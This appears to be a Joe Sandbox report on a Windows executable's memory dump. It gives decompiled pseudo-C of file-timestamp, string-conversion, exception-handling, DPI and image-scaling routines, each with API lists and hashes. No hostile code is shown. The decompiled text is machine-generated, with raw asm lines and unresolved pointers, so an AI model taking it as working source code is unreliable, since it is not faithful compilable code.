0x0102935f
0x0102935f
0x01029361
0x01029364
0x01029367
0x01029369
0x01029371
0x01029377
0x0102937a
0x0102937d
0x0102937e
0x01029381
0x01029384
0x01029384
0x01029389
0x0102938c
0x00000000
0x00000000
0x010293a4
0x010293a9
0x010293ad
0x00000000
0x00000000
0x010293b1
0x010293b4
0x010293b5
0x010293b5
0x010293b7
0x010293ba
0x00000000
0x00000000
0x010293bc
0x010293bf
0x010293c6
0x010293c9
0x010293cc
0x010293e2
0x010293e2
0x010293e2
0x010293ce
0x010293ce
0x010293d0
0x010293d3
0x010293de
0x010293d5
0x010293d8
0x010293d8
0x010293d3
0x00000000
0x010293cc
0x010293c1
0x010293c1
0x010293c3
0x010293c3
0x01029317
0x01029317
0x0102931a
0x010293e5
0x010293e5
0x010293e7
0x010293e9
0x010293ec
0x010293ed
0x010293ee
0x010293ef
0x010293f7
0x010293f7
0x010293f7
0x010293f9
0x010293fc
0x010293ff
0x01029401
0x01029401
0x01029403
0x01029415
0x01029419
0x0102941c
0x01029423
0x0102942b
0x0102942b
0x0102942e
0x01029430
0x01029441
0x01029441
0x01029445
0x01029445
0x01029448
0x0102944a
0x0102944d
0x00000000
0x01029432
0x01029432
0x01029438
0x01029438
0x0102943c
0x0102944f
0x0102944f
0x01029453
0x01029454
0x01029456
0x01029458
0x01029499
0x01029499
0x0102949b
0x010294a8
0x010294a8
0x010294aa
0x010294ac
0x010294ad
0x010294ae
0x010294b5
0x010294b8
0x010294ba
0x010294ba
0x010294bb
0x010294bd
0x010294c0
0x010294c0
0x010294c2
0x010294c4
0x00000000
0x010294c4
0x0102949d
0x0102949f
0x00000000
0x00000000
0x010294a1
0x00000000
0x00000000
0x010294a3
0x010294a6
0x00000000
0x00000000
0x00000000
0x010294a6
0x0102945f
0x01029465
0x01029465
0x01029467
0x01029468
0x01029469
0x0102946a
0x01029471
0x01029474
0x01029476
0x01029477
0x01029479
0x01029486
0x01029486
0x01029488
0x0102948a
0x0102948b
0x0102948c
0x01029493
0x01029496
0x01029498
0x01029498
0x00000000
0x01029498
0x0102947b
0x0102947b
0x0102947d
0x00000000
0x00000000
0x0102947f
0x00000000
0x00000000
0x01029481
0x01029484
0x00000000
0x00000000
0x00000000
0x01029484
0x01029461
0x01029463
0x00000000
0x00000000
0x00000000
0x01029463
0x01029434
0x01029436
0x00000000
0x00000000
0x00000000
0x01029436
0x01029430
0x00000000
0x0102931a
0x01029315
0x0102923c
0x0102923e
0x00000000
0x01029240
0x01029256
0x0102925b
0x0102925d
0x01029269
0x0102926f
0x01029270
0x01029272
0x01029274
0x0102927f
0x0102927f
0x01029282
0x01029284
0x01029284
0x01029287
0x0102925f
0x0102925f
0x0102925f
0x00000000
0x0102925d
0x0102920c
0x0102920c
0x01029213
0x01029214
0x01029216
0x010294c8
0x010294cc
0x010294d1
0x010294d1
0x010294e0
0x010294e0

APIs

_strrchr.LIBCMT ref: 01029269
__alldvrm.LIBCMT ref: 0102946A
__alldvrm.LIBCMT ref: 0102948C

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction ID: fb27fe1bc602be48d3626dc964c2ab7c542b83ca4bbfbb09cd02660c5d1200b9
Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction Fuzzy Hash: 1AA149729043B69FEB22CF58C890BAEBFE5EF55318F1841ADD9C59B281C6389941C750

Uniqueness

Uniqueness Score: -1.00%

Function 0100A2AB, Relevance: 6.1, APIs: 4, Instructions: 127
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0100A2AB(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E0101E360();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E0100A194( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E0100A444( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E01010BDD(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E01010BDD(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E01010BDD(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E0100A444( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E0100B66C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}

0x0100a2ab
0x0100a2b0
0x0100a2bc
0x0100a2c3
0x0100a2c7
0x0100a2d4
0x0100a2d4
0x0100a2d8
0x0100a2d8
0x0100a2e1
0x0100a2ee
0x0100a2ee
0x0100a2f2
0x0100a2f2
0x0100a2fb
0x0100a309
0x0100a309
0x0100a30d
0x0100a314
0x0100a319
0x0100a320
0x0100a336
0x0100a326
0x0100a32f
0x0100a32f
0x0100a351
0x0100a357
0x0100a35e
0x0100a3a8
0x0100a3ad
0x0100a3b6
0x0100a3b6
0x0100a3c0
0x0100a3c9
0x0100a3c9
0x0100a3d3
0x0100a3dc
0x0100a3dc
0x0100a3ec
0x0100a3f0
0x0100a400
0x0100a410
0x0100a416
0x0100a41d
0x0100a425
0x0100a432
0x0100a432
0x00000000
0x0100a360
0x0100a371
0x0100a378
0x0100a437
0x0100a441
0x0100a441
0x0100a395
0x0100a39b
0x0100a3a2
0x00000000
0x00000000
0x00000000
0x0100a3a2
0x0100a35e
0x0100a303
0x0100a307
0x00000000
0x00000000
0x00000000
0x0100a307
0x0100a2e8
0x0100a2ec
0x00000000
0x00000000
0x00000000
0x0100a2ec
0x0100a2ce
0x0100a2d2
0x00000000
0x00000000
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,010080B7,?,?,?), ref: 0100A351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,010080B7,?,?), ref: 0100A395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,010080B7,?,?,?,?,?,?,?,?), ref: 0100A416
CloseHandle.KERNEL32(?,?,00000000,?,010080B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0100A41D

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 04dd8241270ba01b12ded012b2976199529a44ed35b556295d5357a79c8f39e4
Instruction ID: 3c55a04f6552c89e3109a22e1fa70c8fc802cc2b8c00d7d79087c792e19663a9
Opcode Fuzzy Hash: 04dd8241270ba01b12ded012b2976199529a44ed35b556295d5357a79c8f39e4
Instruction Fuzzy Hash: C841ED31248381AAF732DE68CC55FEFBBE8AB95700F04495CB6D0D71C0D6A89A48DB12

Uniqueness

Uniqueness Score: -1.00%

Function 0102C099, Relevance: 6.1, APIs: 4, Instructions: 110
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E0102C099(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x103e668; // 0x7ecdc17e
				_v8 = _t34 ^ _t70;
				E01023DD6(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E0101EC4A(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E0101F350(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E0102A2C0(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E01028518(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E01031A30();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x0102c0a1
0x0102c0a8
0x0102c0b4
0x0102c0b9
0x0102c0be
0x0102c0c3
0x0102c0c6
0x0102c0c8
0x0102c0c8
0x0102c0cd
0x0102c0e6
0x0102c0ec
0x0102c0f1
0x0102c190
0x0102c194
0x0102c199
0x0102c199
0x0102c1b5
0x0102c1b5
0x0102c0f7
0x0102c0ff
0x0102c103
0x0102c14f
0x0102c151
0x0102c153
0x0102c158
0x0102c16f
0x0102c177
0x0102c187
0x0102c187
0x0102c177
0x0102c189
0x0102c18a
0x00000000
0x0102c18f
0x0102c10a
0x0102c10c
0x0102c10e
0x0102c116
0x0102c133
0x0102c13d
0x0102c142
0x00000000
0x00000000
0x0102c144
0x0102c14a
0x0102c14a
0x00000000
0x0102c14a
0x0102c11a
0x0102c11e
0x0102c123
0x0102c127
0x00000000
0x00000000
0x0102c129
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,010289AD,?,00000000,?,00000001,?,?,00000001,010289AD,?), ref: 0102C0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0102C16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,010267E2,?), ref: 0102C181
__freea.LIBCMT ref: 0102C18A

Part of subcall function 01028518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102C13D,00000000,?,010267E2,?,00000008,?,010289AD,?,?,?), ref: 0102854A

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 9576bf85da76988ec310e456f52143edd9d584559e490746ca0946fb158202f1
Instruction ID: 20a667845f2dc5d7815755c6fe34703f2b89ba4c6cc7deed8ed12ea2307e43f3
Opcode Fuzzy Hash: 9576bf85da76988ec310e456f52143edd9d584559e490746ca0946fb158202f1
Instruction Fuzzy Hash: B831F272A0022AABEF258F78DC85DEE7BE9EF45310F144269EC44DB140E739C951CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01022503, Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 20%

			E01022503(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E01022B52(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E0101FC0B(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E01022D54(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E0102230D(_t29, _t32, _t37);
				if(_t25 != 0) {
					E0101FBD9(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x01022503
0x01022503
0x01022506
0x0102250b
0x0102250e
0x01022510
0x01022513
0x01022516
0x01022517
0x0102251a
0x0102251f
0x0102251f
0x01022522
0x01022526
0x01022529
0x0102252e
0x0102252b
0x0102252b
0x0102252b
0x01022531
0x01022537
0x0102253a
0x0102253c
0x0102253f
0x01022542
0x01022543
0x0102254c
0x01022551
0x01022554
0x0102255a
0x0102255d
0x01022560
0x01022563
0x01022564
0x01022567
0x01022572
0x01022576
0x00000000
0x01022576
0x0102257d

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0102251A

Part of subcall function 01022B52: ___AdjustPointer.LIBCMT ref: 01022B9C

_UnwindNestedFrames.LIBCMT ref: 01022531
___FrameUnwindToState.LIBVCRUNTIME ref: 01022543
CallCatchBlock.LIBVCRUNTIME ref: 01022567

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: 3133389dae32bd189e986cb9d6334ab7b7d9acfdcc617ff2c2583a1fe7a63cb0
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: 0701173200011ABBCF129F95CC40EDA3FBAEF58754F058154FD9966120C376E961EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01019DBB, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01019DBB() {
				struct HDC__* _t1;
				struct HDC__* _t5;

				_t1 = GetDC(0);
				_t5 = _t1;
				if(_t5 != 0) {
					 *0x1048428 = GetDeviceCaps(_t5, 0x58);
					 *0x104842c = GetDeviceCaps(_t5, 0x5a);
					return ReleaseDC(0, _t5);
				}
				return _t1;
			}

0x01019dbe
0x01019dc4
0x01019dc8
0x01019dd6
0x01019de4
0x00000000
0x01019de9
0x01019df0

APIs

GetDC.USER32(00000000), ref: 01019DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 01019DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 01019DDB
ReleaseDC.USER32(00000000,00000000), ref: 01019DE9

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 7040e64a81e3d20c3473fc14d0dc945bbcd17df20e65b5d6b37b494fccc0ad9d
Instruction ID: 2fc4790b708636fe3e6cfdc99f922b9f356638c580c8ee43e7f7ae5287e801ad
Opcode Fuzzy Hash: 7040e64a81e3d20c3473fc14d0dc945bbcd17df20e65b5d6b37b494fccc0ad9d
Instruction Fuzzy Hash: A5E0C231985720A7E3301BB4BE0CB8B3F55AB09763F040045FB81AA1CCDA7E4000CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01022016, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01022016() {
				void* _t4;
				void* _t8;

				E01023437();
				E010233CB();
				if(E0102310E() != 0) {
					_t4 = E0102215C(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E0102314A();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x01022016
0x0102201b
0x01022027
0x0102202c
0x01022031
0x01022033
0x0102203e
0x01022035
0x01022035
0x00000000
0x01022035
0x01022029
0x01022029
0x0102202b
0x0102202b

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 01022016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0102201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 01022020

Part of subcall function 0102310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0102311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 01022035

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: c51ea1265a1aa21117ba20108caa3c0538599d7826012c79eaa9948891038e67
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: A3C04828004673D41CA23AF622846FD0B922DBA9C4BE275C2EDC02F243DE0E014AA032

Uniqueness

Uniqueness Score: -1.00%

Function 01019F5D, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E01019F5D(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v84;
				intOrPtr _v116;
				void* _v120;
				short _v122;
				short _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v152;
				signed int _v160;
				intOrPtr _v164;
				char _v180;
				intOrPtr* _v192;
				intOrPtr* _v200;
				signed int _v208;
				char _v212;
				signed int _v216;
				signed int _v220;
				void* _v224;
				char _v228;
				intOrPtr* _v232;
				intOrPtr* _v240;
				void* _v256;
				intOrPtr* _v264;
				void* __edi;
				signed int _t78;
				intOrPtr* _t84;
				void* _t86;
				signed int _t87;
				signed int _t90;
				short _t100;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t107;
				intOrPtr* _t110;
				intOrPtr* _t116;
				intOrPtr* _t128;
				intOrPtr* _t131;
				intOrPtr* _t134;
				void* _t141;
				intOrPtr* _t146;
				intOrPtr* _t158;
				intOrPtr* _t161;
				signed int _t175;
				void* _t177;
				void* _t179;
				intOrPtr* _t181;
				signed int _t195;
				long long* _t197;
				long long _t200;

				_t200 = __fp0;
				if(E01019DF1() != 0) {
					_t141 = _a4;
					GetObjectW(_t141, 0x18,  &_v68);
					_t195 = _v0;
					asm("cdq");
					_t78 = _v72 * _v4 / _v76;
					if(_t78 < _t195) {
						_t195 = _t78;
					}
					_t177 = 0;
					_push( &_v120);
					_push(0x1034684);
					_push(1);
					_push(0);
					_push(0x103546c);
					if( *0x1062174() < 0) {
						L19:
						return _t141;
					} else {
						_t84 = _v140;
						 *0x1033260(_t84, _t141, 0, 2,  &_v136, _t179);
						_t86 =  *((intOrPtr*)( *_t84 + 0x54))();
						_t87 = _v160;
						if(_t86 >= 0) {
							_v152 = 0;
							_t181 =  *((intOrPtr*)( *_t87 + 0x28));
							_t146 = _t181;
							 *0x1033260(_t87,  &_v152);
							if( *_t181() >= 0) {
								_t90 = _v160;
								asm("fldz");
								 *_t197 = _t200;
								 *0x1033260(_t90, _v164, 0x103547c, 0, 0, _t146, _t146, 0);
								if( *((intOrPtr*)( *_t90 + 0x20))() >= 0) {
									E0101F350(0,  &_v136, 0, 0x2c);
									_v132 = _v84;
									_v136 = 0x28;
									_v128 =  ~_t195;
									_v120 = 0;
									_v124 = 1;
									_t100 = 0x20;
									_v122 = _t100;
									_t103 =  *0x106205c(0,  &_v136, 0,  &_v180, 0, 0);
									_v208 = _t103;
									asm("sbb ecx, ecx");
									if(( ~_t103 & 0x7ff8fff2) + 0x8007000e >= 0) {
										_t158 = _v224;
										 *0x1033260(_t158,  &_v212);
										 *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x2c))))();
										_t116 = _v220;
										 *0x1033260(_t116, _v228, _v116, _t195, 3);
										 *((intOrPtr*)( *_t116 + 0x20))();
										_t175 = _v136;
										_t161 = _v240;
										_v220 = _t175;
										_v228 = 0;
										_v224 = 0;
										_v216 = _t195;
										 *0x1033260(_t161,  &_v228, _t175 << 2, _t175 * _t195 << 2, _v232);
										if( *((intOrPtr*)( *_t161 + 0x1c))() < 0) {
											DeleteObject(_v256);
										} else {
											_t177 = _v256;
										}
										_t128 = _v264;
										 *0x1033260(_t128);
										 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 8))))();
									}
									_t104 = _v220;
									 *0x1033260(_t104);
									 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))();
									_t107 = _v220;
									 *0x1033260(_t107);
									 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))();
									_t110 = _v232;
									 *0x1033260(_t110);
									 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 8))))();
									if(_t177 != 0) {
										_t141 = _t177;
									}
									L18:
									goto L19;
								}
								_t131 = _v192;
								 *0x1033260(_t131);
								 *((intOrPtr*)( *((intOrPtr*)( *_t131 + 8))))();
							}
							_t134 = _v200;
							 *0x1033260(_t134);
							 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 8))))();
							_t87 = _v208;
						}
						 *0x1033260(_t87);
						 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 8))))();
						goto L18;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E0101A1E5();
			}

0x01019f5d
0x01019f67
0x01019f80
0x01019f8d
0x01019f9c
0x01019fa3
0x01019fa4
0x01019faa
0x01019fac
0x01019fac
0x01019fb3
0x01019fb5
0x01019fb6
0x01019fbe
0x01019fbf
0x01019fc0
0x01019fcd
0x0101a1da
0x00000000
0x01019fd3
0x01019fd3
0x01019fe7
0x01019fed
0x01019ff2
0x01019ff6
0x0101a00d
0x0101a019
0x0101a01c
0x0101a01e
0x0101a028
0x0101a044
0x0101a048
0x0101a04f
0x0101a061
0x0101a06c
0x0101a08c
0x0101a09b
0x0101a0a3
0x0101a0ab
0x0101a0b4
0x0101a0b8
0x0101a0bd
0x0101a0c0
0x0101a0d1
0x0101a0d9
0x0101a0df
0x0101a0ed
0x0101a0f3
0x0101a104
0x0101a10a
0x0101a10c
0x0101a124
0x0101a12a
0x0101a12d
0x0101a13a
0x0101a141
